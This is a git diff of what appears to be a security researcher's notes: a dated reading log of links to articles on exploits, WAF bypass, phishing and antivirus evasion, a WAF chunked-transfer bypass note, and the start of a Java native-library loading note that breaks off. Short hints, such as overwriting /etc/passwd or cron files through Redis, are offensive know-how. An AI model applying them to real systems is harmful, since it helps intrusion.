290](https://xz.aliyun.com/t/10170) **总结的非常好,在weblogic中启动了全局的过滤器那么如果存在一个cve是jndi,能不能通过ldap打本地反序列化的方法去rce?不能!!!因为ldap打本地反序列化需要有一个gadget虽然weblogic中的gadget非常多但是都被黑名单过滤了又因为是全局过滤器所以在ldap这条路也不能用。除非用jndi......就又一直重复了。** ++ [网络安全14:Struts2框架下Log4j2漏洞检测方法分析与总结](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484207&idx=1&sn=285b54a79e48db9a05816cab2e6afc27&chksm=c25fcc54f5284542c1b9abe870e0caa9f958f4da90723bd83292deed215c63c705b7b0bbfaff&mpshare=1&scene=23&srcid=1225r9kGcJN5evUgMo6ecUCC&sharer_sharetime=1671942359949&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己也find 一些** ++ 2022/12/26 [第27篇:CSRF跨站请求伪造漏洞挖掘及绕过校验方法](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484515&idx=1&sn=eacea9e2e1636d27a4d122a8c28ca98d&chksm=c25fcb18f528420ee30ed8d48d76add6423c736408ce50f4723b7b4aa8213e7ad7d400c268ea&cur_album_id=2660130833605132289&scene=190#rd) **了解了解** ++ 2022/12/26 [API安全学习笔记](https://xz.aliyun.com/t/11977) [玩转graphQL](https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ) **api的安全** ++ 2022/12/27 [某厂商数据库审计系统前台RCE挖掘之旅](https://www.sec-in.com/article/2006) [amazon-redshift-jdbc-driver 任意代码执行漏洞](https://www.sec-in.com/article/896) ++ 2022/12/28 [溯源实例-从OA到某信源RCE全0day渗透](https://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502698&idx=1&sn=5bfb3124ea5e6dde0f75a16dcc0281c7&chksm=c04d4c54f73ac54284ab70eb074cca632f177ce7af61440cf6a9a47ac17b01ad9a105d6b14e0&subscene=236&key=65a52f471bc41d13b06f820a346368bbb4e4f5342b20850e7a77c8224a338af9d3257d5f4d1f771946ff2bde8a2de3838ef166f262aa3a96f7cae7c3b2581ca8a81e130ac03a98e20269c21b3c4388ce02a40367460b5486fa035d58e7973f7e0119cab28b07861b0c03315d5c1285da188ec1b0bfbe37e35ee05af34397a18e&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQp5liK4%2FGWZqVL2Un7OelRxLgAQIE97dBBAEAAAAAAG3xIKrEpowAAAAOpnltbLcz9gKNyK89dVj01MV50uZ2yoWxvdVPBS6nWl9mhSxXxZU6TC1EzeR8twNAtjlPlR%2BlkVNUUWtnUyuEkRgAsssOTDpaTQW1DGrprZEvTAgVXo3NoSI2Wz%2F9eScz2ACkvqF2rDsjp7WCVYF2Hl06xyJpJrlMNtn8AFjdPRh2352Y5klVxQ7BEtppP0ymCCSvNXigWUp5r1efdCEt6C7IMr12jsU4QaBGzmIASwIwdPunj6oeyeww%2B27Awg4kpvYKMBxgCZR9&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCXlPlkLM%2FrS4cixsrs5q4hv2Q3obpsbuOUcPLpKfDhtHA%3D%3D&wx_header=1&fontgear=2) **不错** ++ 2022/12/28 [Android 远程攻击面——WebView 攻防](https://mp.weixin.qq.com/s?__biz=MzI0Njg4NzE3MQ==&mid=2247490611&idx=1&sn=837678e428d46cddf588c8d6fc8b7dfd&chksm=e9b93a5fdeceb349357bd2cdb290ae1c31e8e63b8f3c793ee24780fb5af9b68f95812ead9f13&subscene=236&key=fe7e74d3eacd7a65828a0ce0e318fdea2e2ccd9e009a21e3e4624d8991854c06c5b6cae849bc9e4e44533463ae99a2c32dc7b3d3d085a0504aa762fdf7d10e650e04f312a4af452e290c74eb09aa3b920b4d755383b4656815d50939776dae2b1a3708ed2dc80b61f0cb947562edf2c404fdbf88353b3da1a1ce7c0bb1e146b5&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQkmMc3S%2BR4POkBz6WNBhgzhLgAQIE97dBBAEAAAAAAEt1Ay0JAV0AAAAOpnltbLcz9gKNyK89dVj0%2FvvQaNijZxhY4D5kpMxru76EYhQ6ux%2BmNJ7Yb0mAhoiwczAd6gUnkS6geo44uTYsLTCJdvSqGoJm%2BSlQc7QOaLOYE7M4J2tjl7BZZd1SDJly%2BY2r5Z%2FYGl80IKiMXYWDnQW8ghg2yu5p9x%2FqI7W0SMnmoSXYuSbFfwfBjlYDoTdQvk3PQ1qnRsRkwmFqr335CD7pLQeFal3FiaJ3JYIC%2BC8Rk6r9DGhatU5IRLe8o2EevyG35KnmpqW8&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCU9NSOr5Ca%2Bl68ysc6dTAsgsjjNjYJt%2BpYHw6rW7dB9ag%3D%3D&wx_header=1&fontgear=2) **之后说不定遇到学习** ++ 2022/12/28 [CVE-2022-08475-DirtyPipe](https://mp.weixin.qq.com/s/irugqDGx3OdZylcSGlMfZg) **学习** ++ 2022/12/29 [SpringBoot 过滤器、拦截器、监听器对比及使用场景](https://mp.weixin.qq.com/s?__biz=MzU4MDUyMDQyNQ==&mid=2247512806&idx=1&sn=318c6db2e1d16c5d9521ce9b9a2fb2ac&chksm=fd576260ca20eb76728e35c1f117aa1d061c1bb018bed5f9395ca8bb44aa86acae73d0320371&mpshare=1&scene=23&srcid=122980IZlDnN4Gzh8Mca6QxM&sharer_sharetime=1672286098025&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/12/29 [看图识WAF-搜集常见WAF拦截页面](https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247505571&idx=2&sn=455e76881cf5f069527c3ca6848093fe&chksm=fc3c6fa2cb4be6b4f6aaa14d3d927daa243ea5097f380f85feab844eb617a5d720372275fedb&mpshare=1&scene=23&srcid=1229yAzgrWljKcryXoK9hoVh&sharer_sharetime=1672281327599&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **收集学习** ++ 2022/12/31 嗯其实没有看什么文章主要是在写代码,还是假装记录一下。新年快乐!!! + +## 2023 ++ 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** ++ 2023/01/02 [华为云CTF cloud非预期解之k8s渗透实战](https://annevi.cn/2020/12/21/%e5%8d%8e%e4%b8%ba%e4%ba%91ctf-cloud%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e4%b9%8bk8s%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/) **学习** ++ 2023/01/04 [Soot 静态分析框架(五)Annotation 的实现](https://blog.csdn.net/raintungli/article/details/102634829) **soot中存在api直接调用注解信息** ++ 2023/01/08 [浅谈Nacos漏洞之超管权限后续利用](https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495724&idx=2&sn=dcc0629faaf7379bba94a34937db3358&chksm=c1760d83f6018495787c8c4e747f2507ae50ffc7d3fb318ac45892dd1b216b70e942b74259e1&mpshare=1&scene=23&srcid=0107IDEenH2fh5g0656NUtgL&sharer_sharetime=1673107217827&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/01/08 [【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍](https://www.cnpanda.net/codeaudit/1037.html) ++ 2023/01/08 [第45篇:weblogic反序列化漏洞绕waf方法总结,2017-10271与2019-2725漏洞绕waf防护](https://mp.weixin.qq.com/s/8hUYRYoAqjthqgBI_zn9ZA) **weblogic中可以使用编码绕过** ++ 2023/01/09 [调教某数字杀软,权限维持so easy](https://mp.weixin.qq.com/s/IYGon3X4-cQwnwwb1WZWww) **现在还看不懂!** ++ 2023/01/09 [玩转CodeQLpy之代码审计实战案例](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247485587&idx=1&sn=70b400682976cf82fc1d41fceba7e76e&chksm=c2a1dc1af5d6550c7b5b19b8810ede0bb920c7dad168ac3db3c9cbedfc6e2d4b29a3b42144e6&mpshare=1&scene=23&srcid=01064grkrTL43aUSw4HyhlEh&sharer_sharetime=1673004615548&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可以试一试自己的VI能不能扫描出来** ++ 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** ++ 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** ++ 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** ++ 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) [某app测试](https://mp.weixin.qq.com/s/_7wSWy0gIMMZmVeOtFgdsw) ++ 2023/01/13 [JVM Shellcode注入探索](https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A) **np** ++ 2023/01/14 [第46篇:伊朗APT组织入侵美国政府内网全过程揭秘(上篇)](https://mp.weixin.qq.com/s/LarjLeYFqDQh7I0jpFZwHA) ++ 2023/01/16 [Hacking Redis for fun and CTF points,redis的利用](https://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec1) **npnp** ++ 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) ++ 2023/01/17 [玩转CodeQLpy之用友GRP-U8漏洞挖掘](https://mp.weixin.qq.com/s/hYPdNN6skbikC3FFYRlbrQ) **可以尝试用vi跑一下** ++ 2023/01/17 [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s?__biz=Mzg4MzY5NjIyMg==&mid=2247483755&idx=1&sn=4e9ae8be2a0950ecfe99281689001e06&chksm=cf42365af835bf4ceb041fdbbb108cffbfbef253f41d9197760e11f774749eeb1e721f070fd8&mpshare=1&scene=23&srcid=0117LLaambwHZZNnlAY1Pqnm&sharer_sharetime=1673954336737&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **np 学习** ++ 2023/01/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** ++ 2023/01/18 [从“假漏洞”到“不忘初心”](https://mp.weixin.qq.com/s?__biz=Mzg5OTU1NTEwMg==&mid=2247483948&idx=1&sn=f4a1cbe8131ce0812714fda95147bc79&chksm=c050c85df727414bb25fb90e52edf81bc1d2ae6222cc29d54d4e810537e0c83bf579958a3e4c&mpshare=1&scene=23&srcid=0117ma1Ywz1TACmdsaaIMMTP&sharer_sharetime=1674008997482&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/01/19 [分享几个 IDEA 下 git 使用小技巧](https://www.bilibili.com/video/BV1yW4y1N7mR/?buvid=Y8497289E888F86F46BC91648B98C847C1AA&is_story_h5=false&mid=Rbxe%2Bk7llEVOThj%2FWkKmvQ%3D%3D&p=1&plat_id=116&share_from=ugc&share_medium=iphone&share_plat=ios&share_session_id=C5D45C2B-571E-4A34-8425-2082CA8630B3&share_source=QQ&share_tag=s_i×tamp=1674063016&unique_k=FWgBBSP&up_id=186408046) **确实有用** ++ 2023/01/19 [CVE-2022-35741 Apache CloudStack SAML XXE注入](https://xz.aliyun.com/t/11600) **Apache CloudStack 云计算的东西国内没有看到过** ++ 2023/01/19 [Xalan包在XXE问题中的坑](https://www.freebuf.com/vuls/238005.html) **之前就遇到了如果有xalan依赖的时候会导致xxe防御失去效果** ++ 2023/01/29 [红队:IIS短文件名猜解在拿权限中的巧用](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247491093&idx=1&sn=9ebedfadd4b86cbb319c085fdfbdaf1d&chksm=cea8f555f9df7c4370ab5efe4248c3ca144381556d6299c2e9ab1d83229a38ad82b208f70cb6&mpshare=1&scene=23&srcid=0128dKktHmtVydWzC2jEaQ44&sharer_sharetime=1674914927543&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **了解** ++ 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** ++ 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** ++ 2023/01/30 [Docmosis Tornado的漏洞](https://frycos.github.io/vulns4free/2023/01/24/0days-united-nations.html) ++ 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) ++ 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) ** 可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** ++ 2023/02/02 [水平越权挖掘技巧与自动化越权漏洞检测](https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8) ++ 2023/02/03 [ImageMagick:隐藏在网上图像背后的漏洞](https://mp.weixin.qq.com/s/zJkZbNmA1vDkpxP0SNVxHA) **np** ++ 2023/02/06 [Numen安全研究员发现Apache Linkis漏洞CVE-2022-44645](https://mp.weixin.qq.com/s/rrC_CkSvEOsb8Xib21co0A) **黑名单可以bypass** ++ 2023/02/08 [实战钓鱼之url魔改](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247490656&idx=1&sn=0d98bc095f34ecfb53f0c0d5d835ba32&chksm=c187dc71f6f0556707214ade4ebd207f2a6aeba469f5641f15d96892c13a37a8856c67421f1c&mpshare=1&scene=23&srcid=0208XWF2fNX9S3weD9OrMXKT&sharer_sharetime=1675853346072&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **有点意思,可以用在钓鱼方面** ++ 2023/02/10 [json 格式 bypass waf](https://lab.wallarm.com/waf-json-decoding-capability-required-to-protect-against-api-threats-like-cve-2020-13942-apache-unomi-rce/) **json 默认支持 unicode 编码** ++ 2023/02/10 [红队攻防实践:unicode进行webshell免杀的思考](https://mp.weixin.qq.com/s?__biz=MzI4MzA0ODUwNw==&mid=2247484997&idx=1&sn=8694814291d80337928e59afd3034b4c&chksm=eb91e911dce6600735f1d4fae65fb01c682fe9bddc3e72a67d2ae993baac5ccc1f93c1924467&cur_album_id=1342350211271966722&scene=189#wechat_redirect) **里面的零宽连接符ZWJ有意思** [零宽字符妙用](https://1991421.cn/2021/03/08/3c5b1b78/) ++ 2023/02/11 [PWN2OWNING TWO HOSTS AT THE SAME TIME: ABUSING INDUCTIVE AUTOMATION IGNITION’S CUSTOM DESERIALIZATION](https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization) ++ 2023/02/14 [环境变量的利用](https://www.elttam.com/blog/env/#content) **np的** ++ 2023/02/14 [GHSL-2021-1009: URL access filters bypass in Alpine - CVE-2022-23553](https://securitylab.github.com/advisories/GHSL-2021-1009-Alpine/) **很多这样的bypass权限的利用** ++ 2023/02/16 [XXE with Auto-Update in install4j](https://frycos.github.io/vulns4free/2023/02/12/install4j-xxe.html) **这个思路非常好,很多产品自动更新的时候去server端解析传递过来的xml格式就可能造成xxe。我们只需要evil server就可以完成攻击** ++ 2023/02/18 [https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A](顶级Javaer都在使用的类库,真香!) **可以记录一下** ++ 2023/02/19 [Java代码审计项目--某在线教育开源系统](https://mp.weixin.qq.com/s/4sZWD792zxLIkIXPk01yhA) **这个流程是比较好的,看一些过滤器和监听器** ++ 2023/02/19 [关于使用OCR文字识别方式进行免杀](https://xz.aliyun.com/t/12114) **好思路啊** ++ 2023/02/20 [redis安全学习小记](https://mp.weixin.qq.com/s/W9joCtUQfNA62ZWXwqMmsw) **redis安全学习** ++ 2023/02/20 [一次“SSRF-->RCE”的艰难利用](https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247483865&idx=1&sn=41e56040229e383a82a671fc359ee82b&chksm=f9ee6d66ce99e470d102becfcf63955f2aae1d88bc43ef8e7939bc93d786ff2f994eac969d32&scene=21&sessionid=1586255695&key=c00e1a5b49adb240be940797e7d3cb821bae9b89771be268faa858b2888bbba3e96562ccac53df81389cb41e548a9e6412d4f83b6b7b541825630aa6ace9d1d040a3b7cd677b5ca137cc9b1d2297948e&ascene=1&uin=MzE0MDM4MzExMw==&devicetype=Windows%2010&version=62080079&lang=zh_CN&exportkey=A6a52QI1M4H5IGXp8ekqTtY=&pass_ticket=awXcPg/ApqlfbrG8njT11ZZYAGjwbhrnExtbvARh//rtbsupQLnZBKBPE6SCXvhn#wechat_redirect) **学习** ++ 2023/02/20 [五一快乐-微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) ++ 2023/02/23 [实战 | 记一次针对非法网站的SSRF渗透](https://mp.weixin.qq.com/s/yfWAu6ebXA14GfOTP86XsA) ++ 2023/02/24 [【剖析 | SOFARPC 框架】之 SOFARPC 序列化比较](https://www.sofastack.tech/blog/sofa-rpc-serialization-comparison/) ++ 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** ++ 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** [Threat Analysis: MSI - Masquerading as a Software Installer](https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer) ++ 2023/03/07 [为什么 Nginx 比 Apache 更牛叉?](https://mp.weixin.qq.com/s/nz0OZsa0rEyF5L40rD5zYg) ++ 2023/03/08 [A New Vector For “Dirty” Arbitrary File Write to RCE](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) [uwsgi生产环境](https://www.cnblogs.com/chunlin99x/p/16291085.html) uwsgi环境写文件rce ++ 2023/03/11 [CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus](https://blog.noah.360.net/cve-2022-36413-unauthorized-reset-password-of-zoho-manageengine-adselfservice-plus/) ++ 2023/03/11 [第53篇:某OA系统的H2数据库延时注入点不出网拿shell方法](https://mp.weixin.qq.com/s/Lu4V_J6cresqmVnfQmg05g) **思路不错** ++ 2023/03/12 [chatgpt能分析0day漏洞么?](https://mp.weixin.qq.com/s?__biz=MzI1MDA1MjcxMw==&mid=2649907994&idx=1&sn=8984318d81b046ab202650f52557a12b&chksm=f18eea1cc6f9630aca2d2e6d88a767ffc5bd2f44e4367e1b0c68669b11097388b3c5f1e044a0&mpshare=1&scene=23&srcid=0312uHzVdJj4KvnBdTHy0TKM&sharer_sharetime=1678611522010&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **ai np** ++ 2023/03/12 [钓鱼邮件中绕过内容检测的一种方式](https://mp.weixin.qq.com/s/oDFCn5K4rXXg-_ALv0-qYw) **bypass 好多内容敏感检测** ++ 2023/03/13 [攻击技术研判 | 使用蜂鸣器对抗沙箱检测技术](https://mp.weixin.qq.com/s/DrUWV4baPIA3WtCVjFp3gw) **就是利用其api实现sleep的效果,对抗沙箱** ++ 2023/03/14 [从挑战赛看阿里云RASP防御优势与云上最佳实践](https://mp.weixin.qq.com/s?__biz=MzA4MTQ2MjI5OA==&mid=2664088876&idx=1&sn=cc29a7dc475e08300390eae40902808d&chksm=84aaf059b3dd794fe63c1f8af5cdafbca404bdd2e956a658f0807ba5e74d98cfc9369573e64c&mpshare=1&scene=23&srcid=0313b3xCwrxOPs14Cc4DeDtz&sharer_sharetime=1678702681315&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/15 [永恒之蓝Windows10版踩坑复现](https://mp.weixin.qq.com/s/H8cOsXmH0EzDPEBsPgvMrg) ++ 2023/03/17 [老洞新绕](https://mp.weixin.qq.com/s/V1MWq8NBkSDjTBY4AiW6Pw) **tomcat 路径特性和Axis特性** ++ 2023/03/17 [Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!](https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg) ++ 2023/03/19 [Django下防御Race Condition漏洞](https://mp.weixin.qq.com/s/9f5Hxoyw5ne8IcYx4uwwvQ) ++ 2023/03/23 [redis未授权到shiro反序列化](https://xz.aliyun.com/t/11198) 在shiro中不错,可以尝试找其他触发点,基本上在数据库的操作上 ++ 2023/03/24 [Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?srcid=0324U8WlT7MpOqTIt0vM2MJD&scene=23&sharer_sharetime=1679630653991&mid=2247495227&sharer_shareid=33fdea7abe6be586e131951d667ccd06&sn=5ab9bcc3d89d57ff9799f88c3363814c&idx=1&__biz=MzkyNDA5NjgyMg%3D%3D&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1#rd) **hessian的利用** ++ 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** ++ 2023/03/27 [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) ++ 2023/03/29 [zeppelin 未授权任意命令执行漏洞复现](https://edu.hetianlab.com/post/94) ++ 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) ++ 2023/03/31 [The curl quirk that exposed Burp Suite & Google Chrome](https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome) **@的问题** ++ 2023/04/02 [日志库logback的攻击路径](https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug) ++ 2023/04/02 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) ++ 2023/04/02 [DFA敏感词算法](https://mp.weixin.qq.com/s?__biz=MzU1ODcxNDgyMA==&mid=2247484121&idx=1&sn=2f1f40f73124aca46f6572f5235d945a&chksm=fc231872cb549164a13f5f74ce43201390aaeada5f5f897537c3999af583aac184f1ce81d504&mpshare=1&scene=23&srcid=0402QW1pkeLvwamFjHBi3hvz&sharer_sharetime=1680424676004&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/04/12 [java-exploitation-restrictions-in](https://codewhitesec.blogspot.com/2023/04/java-exploitation-restrictions-in.html) ++ 2023/04/15 [Apache Solr 9.1 RCE 分析 CNVD-2023-27598](https://blog.noah.360.net/apache-solr-rce/) **todo** ++ 2023/04/19 [RCE进入内网接管k8s并逃逸进xx网-实战科普教程(一)](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651106315&idx=1&sn=97e4337a8c5d95952ae44ddf358aa366&chksm=8c6b6a28bb1ce33e57b1985491e7375511a7e87be3a51bce751b94dacec2385a1477c4f89e24&mpshare=1&scene=23&srcid=0419GSbLma7eb91vWCxXAnsM&sharer_sharetime=1681872082937&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **学** ++ 2023/05/31 [Nacos结合Spring Cloud Gateway RCE利用](https://xz.aliyun.com/t/11493) ++ 2023/06/03 [Nevado JMS反序列化审计tips](https://novysodope.github.io/2023/04/01/95/) ++ 2023/06/03 [Celery Redis未授权访问利用](https://forum.butian.net/share/224) ++ 2023/06/04 [cname记录是什么?他存在的意义是什么?](https://www.zhihu.com/question/22916306) ++ 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) ++ 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) ++ 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** ++ 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) [cdn原理分析-本地搭建cdn模拟访问过程](https://mp.weixin.qq.com/s/u-VWrrdlkRzKs7u04EPV-g) ++ 2023/07/02 [一种基于规则的 JavaWeb 回显方案](https://mp.weixin.qq.com/s/hIPz0LEk_OW_IpUbfKBYMg) ++ 2023/07/11 [企业微信密钥泄露利用小案例](https://mp.weixin.qq.com/s/mptsykGJHmRC87dYqFFqMw) diff --git "a/java\346\227\245\345\270\270/chunked-coding-converter.md" "b/java\346\227\245\345\270\270/chunked-coding-converter.md" new file mode 100644 index 0000000..4cd529f --- /dev/null +++ "b/java\346\227\245\345\270\270/chunked-coding-converter.md" @@ -0,0 +1,20 @@ +# chunked-coding-converter + +[唯快不破的分块传输绕WAF](https://mp.weixin.qq.com/s/pM1ULCqNdQwSB7hcltrbtw) + +[Bypass WAF HTTP协议覆盖+分块传输组合绕过](https://mp.weixin.qq.com/s/2DDYyvsZ5HIQC0qGMK9znQ) + +[利用分块传输吊打所有WAF](https://mp.weixin.qq.com/s/eDiiiVX4oF0LYG3Ia5P4mw) + +[技术讨论 | 在HTTP协议层面绕过WAF](https://www.freebuf.com/news/193659.html) + +[编写Burp分块传输插件绕WAF](https://gv7.me/articles/2019/chunked-coding-converter/) + +[Java反序列化数据绕WAF之延时分块传输](https://gv7.me/articles/2021/java-deserialized-data-bypasses-waf-through-sleep-chunked/) + +``` +只有HTTP/1.1支持分块传输 +POST包都支持分块,不局限仅仅于反序列化和上传包 +Transfer-Encoding: chunked大小写不敏感 +``` + diff --git "a/java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent?!.md" "b/java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" similarity index 100% rename from "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent?!.md" rename to "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" diff --git "a/java\346\227\245\345\270\270/img/image-20220325230922109.png" "b/java\346\227\245\345\270\270/img/image-20220325230922109.png" new file mode 100644 index 0000000..c89682d Binary files /dev/null and "b/java\346\227\245\345\270\270/img/image-20220325230922109.png" differ diff --git "a/java\346\227\245\345\270\270/img/image-20221220230825845.png" "b/java\346\227\245\345\270\270/img/image-20221220230825845.png" new file mode 100644 index 0000000..3d05b8e Binary files /dev/null and "b/java\346\227\245\345\270\270/img/image-20221220230825845.png" differ diff --git "a/java\346\227\245\345\270\270/img/image-20221220233047039.png" "b/java\346\227\245\345\270\270/img/image-20221220233047039.png" new file mode 100644 index 0000000..9b6fda5 Binary files /dev/null and "b/java\346\227\245\345\270\270/img/image-20221220233047039.png" differ diff --git "a/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" "b/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" new file mode 100644 index 0000000..d797145 --- /dev/null +++ "b/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" @@ -0,0 +1,75 @@ +# java 加载链接库的方法 + +https://tttang.com/archive/1436/ + +1.System.load + +```java +try { + System.load("D:\\temp\\calc_x64.dll"); +}catch 